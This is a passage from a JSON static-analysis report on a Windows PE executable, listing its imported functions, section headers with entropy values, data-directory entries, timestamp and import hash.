  1250. "address": "0x401008"
  1251. },
  1252. {
  1253. "name": "RegOpenKeyExW",
  1254. "address": "0x40100c"
  1255. }
  1256. ],
  1257. "dll": "ADVAPI32.dll"
  1258. },
  1259. {
  1260. "imports": [
  1261. {
  1262. "name": "ImageList_Add",
  1263. "address": "0x401014"
  1264. }
  1265. ],
  1266. "dll": "COMCTL32.dll"
  1267. }
  1268. ],
  1269. "digital_signers": null,
  1270. "exported_dll_name": null,
  1271. "actual_checksum": "0x0006d473",
  1272. "overlay": null,
  1273. "imagebase": "0x00400000",
  1274. "reported_checksum": "0x00000000",
  1275. "icon_hash": null,
  1276. "entrypoint": "0x00446f6d",
  1277. "timestamp": "2017-06-26 19:27:00",
  1278. "osversion": "4.0",
  1279. "sections": [
  1280. {
  1281. "name": ".text",
  1282. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  1283. "virtual_address": "0x00001000",
  1284. "size_of_data": "0x0005b000",
  1285. "entropy": "6.41",
  1286. "raw_address": "0x00001000",
  1287. "virtual_size": "0x0005a538",
  1288. "characteristics_raw": "0x70000020"
  1289. },
  1290. {
  1291. "name": ".data",
  1292. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1293. "virtual_address": "0x0005c000",
  1294. "size_of_data": "0x00003000",
  1295. "entropy": "4.54",
  1296. "raw_address": "0x0005c000",
  1297. "virtual_size": "0x00002d80",
  1298. "characteristics_raw": "0xd0000040"
  1299. },
  1300. {
  1301. "name": ".sxdata",
  1302. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1303. "virtual_address": "0x0005f000",
  1304. "size_of_data": "0x00001000",
  1305. "entropy": "0.07",
  1306. "raw_address": "0x0005f000",
  1307. "virtual_size": "0x0000006c",
  1308. "characteristics_raw": "0xc0000240"
  1309. },
  1310. {
  1311. "name": ".reloc",
  1312. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1313. "virtual_address": "0x00060000",
  1314. "size_of_data": "0x00002000",
  1315. "entropy": "3.98",
  1316. "raw_address": "0x00060000",
  1317. "virtual_size": "0x000011aa",
  1318. "characteristics_raw": "0x42000040"
  1319. }
  1320. ],
  1321. "resources": [],
  1322. "dirents": [
  1323. {
  1324. "virtual_address": "0x00000000",
  1325. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1326. "size": "0x00000000"
  1327. },
  1328. {
  1329. "virtual_address": "0x0005abdc",
  1330. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1331. "size": "0x00000064"
  1332. },
  1333. {
  1334. "virtual_address": "0x00000000",
  1335. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1336. "size": "0x00000000"
  1337. },
  1338. {
  1339. "virtual_address": "0x00000000",
  1340. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1341. "size": "0x00000000"
  1342. },
  1343. {
  1344. "virtual_address": "0x00000000",
  1345. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1346. "size": "0x00000000"
  1347. },
  1348. {
  1349. "virtual_address": "0x00060000",
  1350. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1351. "size": "0x00000eec"
  1352. },
  1353. {
  1354. "virtual_address": "0x00000000",
  1355. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1356. "size": "0x00000000"
  1357. },
  1358. {
  1359. "virtual_address": "0x00000000",
  1360. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1361. "size": "0x00000000"
  1362. },
  1363. {
  1364. "virtual_address": "0x00000000",
  1365. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1366. "size": "0x00000000"
  1367. },
  1368. {
  1369. "virtual_address": "0x00000000",
  1370. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1371. "size": "0x00000000"
  1372. },
  1373. {
  1374. "virtual_address": "0x00000000",
  1375. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1376. "size": "0x00000000"
  1377. },
  1378. {
  1379. "virtual_address": "0x00000000",
  1380. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1381. "size": "0x00000000"
  1382. },
  1383. {
  1384. "virtual_address": "0x00001000",
  1385. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1386. "size": "0x000001a0"
  1387. },
  1388. {
  1389. "virtual_address": "0x00000000",
  1390. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1391. "size": "0x00000000"
  1392. },
  1393. {
  1394. "virtual_address": "0x00000000",
  1395. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1396. "size": "0x00000000"
  1397. },
  1398. {
  1399. "virtual_address": "0x00000000",
  1400. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1401. "size": "0x00000000"
  1402. }
  1403. ],
  1404. "exports": [],
  1405. "guest_signers": {},
  1406. "imphash": "7073758031d4012622cea53183697aac",
  1407. "icon_fuzzy": null,
  1408. "icon": null,
  1409. "pdbpath": null,
  1410. "imported_dll_count": 4,
  1411. "versioninfo": []
  1412. }
  1413. }